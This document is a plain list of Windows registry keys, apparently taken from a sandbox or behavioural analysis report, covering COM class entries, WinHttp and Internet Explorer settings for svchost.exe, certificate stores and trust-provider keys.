  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
  • HKEY_CURRENT_USER\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
  • HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
  • HKEY_CURRENT_USER\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
  • HKEY_CURRENT_USER\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\Tracing
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\Tracing\Enabled
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\DisableBranchCache
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameTabWindow
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameMerging
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\SessionMerging
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\AdminTabProcs
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\TabProcGrowth
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\NavigationDelay
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\svchost.exe
  • HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideOnDesktopPerUser
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsAliasedNotifications
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsUniversalDelegate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\NoFileFolderJunction
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\PinToNameSpaceTree
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HasNavigationEnum
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}
  • HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
  • HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{871c5380-42a0-1069-a2ea-08002b30309d}\InProcServer32
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{871C5380-42A0-1069-A2EA-08002B30309D}
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IEDDE_REGISTER_PROTOCOL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IEDDE_REGISTER_PROTOCOL
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\BrowserEmulation
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\BrowserEmulation
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\MediaTypeClass
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Accepted Documents
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ratings
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings\Key
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Security
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\No3DBorder
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\No3DBorder
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
  • HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
  • HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\https\
  • HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\Feature_Enable_Compat_Logging
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\Feature_Enable_Compat_Logging
  • HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
  • HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\UA Tokens
  • HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Pre Platform
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\*
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
  • HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\UrlMon Settings
  • HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TravelLog
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\TravelLog
  • HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
  • HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Certificates
  • HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CRLs
  • HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CTLs
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Initialization\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Signature\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Cleanup\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Cleanup\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Cleanup\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_USERS\S-1-5-21-2280033686-3172497658-3481507381-1000
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\State
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\Safety Warning Level
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
  • HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPublisher\Safer
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionLow
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionHigh
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionLow
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionHigh
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
